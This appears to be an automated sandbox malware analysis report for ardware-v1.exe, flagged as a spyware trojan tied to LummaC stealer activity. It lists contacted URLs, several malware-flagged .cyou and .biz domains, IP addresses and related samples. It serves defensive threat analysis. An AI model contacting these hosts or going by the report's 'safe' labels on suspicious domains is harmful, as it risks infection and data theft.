                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&amp;l=english&ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://community.fastly.steamstatic.com/ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://steam.tv/ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://ocsp.sectigo.com00ardware-v1.exefalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=enardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://lev-tolstoi.com/ardware-v1.exe, ardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001707867.0000000000B0B000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220131253.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219399245.0000000000A56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              http://store.steampowered.com/privacy_agreement/ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://wrathful-jammy.cyou/ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://community.fastly.steamstatic.comardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://store.steampowered.com/points/shop/ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://awake-weaves.cyou/apiiardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                      		unknown
                                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://lev-tolstoi.com/S$_ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                          		unknown
                                                                                                                                          http://ocsp.rootca1.amazontrust.com0:ardware-v1.exe, 00000000.00000003.3087715098.00000000035B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&aardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://sketchfab.comardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://www.ecosia.org/newtab/ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://lv.queniujq.cnardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://steamcommunity.com/profiles/76561199724331900/inventory/ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brardware-v1.exe, 00000000.00000003.3088801564.0000000003825000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.youtube.com/ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.fastJardware-v1.exe, 00000000.00000003.3027817857.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://store.steampowered.com/privacy_agreement/ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://wrathful-jammy.cyou/DI;ardware-v1.exe, 00000000.00000003.3002259229.0000000000A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                              		unknown
                                                                                                                                                              https://sordid-snaked.cyou/sardware-v1.exe, 00000000.00000002.3220131253.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219399245.0000000000A56000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                              		unknown
                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://www.google.com/recaptcha/ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://checkout.steampowered.com/ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477ardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://lev-tolstoi.com/teardware-v1.exe, 00000000.00000003.3152887612.0000000000B03000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3165739361.0000000000B09000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://store.steampowered.com/;ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://store.steampowered.com/about/ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://steamcommunity.com/my/wishlist/ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://ocsp.sectigo.com0ardware-v1.exefalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://help.steampowered.com/en/ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://steamcommunity.com/market/ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://store.steampowered.com/news/ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiardware-v1.exe, 00000000.00000003.3089363104.0000000003596000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Qardware-v1.exefalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ardware-v1.exe, 00000000.00000003.3028706010.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028628315.0000000003540000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3028528667.0000000003543000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://lev-tolstoi.com/apimardware-v1.exe, 00000000.00000003.3027684037.0000000000A90000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                http://store.steampowered.com/subscriber_agreement/ardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#ardware-v1.exefalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgardware-v1.exe, 00000000.00000003.3121763569.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3002259229.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3199466925.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3027684037.0000000000AE0000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://recaptcha.net/recaptcha/;ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://lev-tolstoi.com/uoardware-v1.exe, 00000000.00000002.3220377996.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3219663719.0000000000B15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        https://steamcommunity.com/discussions/ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://store.steampowered.com/stats/ardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amardware-v1.exe, 00000000.00000003.3001837949.0000000000B01000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.3001837949.0000000000AF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high

                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              172.67.157.254
                                                                                                                                                                                                              		lev-tolstoi.comUnited States
                                                                                                                                                                                                              		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                              45.77.249.79
                                                                                                                                                                                                              		immureprech.bizUnited States
                                                                                                                                                                                                              		20473AS-CHOOPAUSfalse
                                                                                                                                                                                                              23.55.153.106
                                                                                                                                                                                                              		steamcommunity.comUnited States
                                                                                                                                                                                                              		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                              104.131.68.180
                                                                                                                                                                                                              		deafeninggeh.bizUnited States
                                                                                                                                                                                                              		14061DIGITALOCEAN-ASNUSfalse

                                                                                                                                                                                                              General Information

                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1577233
                                                                                                                                                                                                              Start date and time:2024-12-18 09:50:08 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 5m 35s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:4
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:ardware-v1.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal96.troj.spyw.evad.winEXE@1/0@13/4
                                                                                                                                                                                                              EGA Information:Failed
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                                                                              • Number of non-executed functions: 3
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe

                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                              • Execution Graph export aborted for target ardware-v1.exe, PID 1972 because there are no executed function
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                              03:52:22API Interceptor13x Sleep call for process: ardware-v1.exe modified

                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                              IPs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              172.67.157.254https://t.co/nq9BYOxCg9Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                45.77.249.79UoktqWamLR.exeGet hashmaliciousAZORultBrowse
                                                                                                                                                                                                                • ehzwq.shop/erd/mac/index.php
                                                                                                                                                                                                                RgZaLjgCto.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                                                • uyhgqunqkxnx.pw/EiDQjNbWEQ/
                                                                                                                                                                                                                java.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                                                • uyhgqunqkxnx.pw/EiDQjNbWEQ/
                                                                                                                                                                                                                23.55.153.106sNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                          wN8pQhRNnu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            AZCFTWko2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              I37faEaz1K.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                YbJEkgZ4z5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  3cb2b5U8BR.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    104.131.68.180java.exeGet hashmaliciousTinbaBrowse
                                                                                                                                                                                                                                    • uyhgqunqkxnx.pw/EiDQjNbWEQ/

                                                                                                                                                                                                                                    Domains

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    deafeninggeh.bizsNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    immureprech.bizsNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                    hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                    SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                    • 178.62.201.34
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                    • 104.131.68.180
                                                                                                                                                                                                                                    steamcommunity.comsNWQ2gC6if.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 23.55.153.106
                                                                                                                                                                                                                                    file.exeGet hashmaliciousAmadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Stealc, XmrigBrowse
                                                                                                                                                                                                                                    • 104.102.49.254
                                                                                                                                                                                                                                    hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                    DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                    he55PbvM2G.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                    SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                    N1sb7Ii2YD.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                    • 104.121.10.34
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LiteHTTP Bot, LummaC Stealer, Stealc, XmrigBrowse
                                                                                                                                                                                                                                    • 104.121.10.34

                                                                                                                                                                                                                                    ASNs

                                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                    AS-CHOOPAUS66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                    • 45.63.94.214
                                                                                                                                                                                                                                    hpEAJnNwCB.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    DG55Gu1yGM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    SkaKk8Z1J0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LiteHTTP Bot, LummaC Stealer, RHADAMANTHYS, XmrigBrowse
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    Setup.exe (1).zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 209.222.21.115
                                                                                                                                                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                                                                                                                                                                    • 45.77.249.79
                                                                                                                                                                                                                                    mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                    • 149.248.45.75
                                                                                                                                                                                                                                    bot.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                    • 45.32.181.8
                                                                                                                                                                                                                                    AKAMAI-ASN1EUmipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
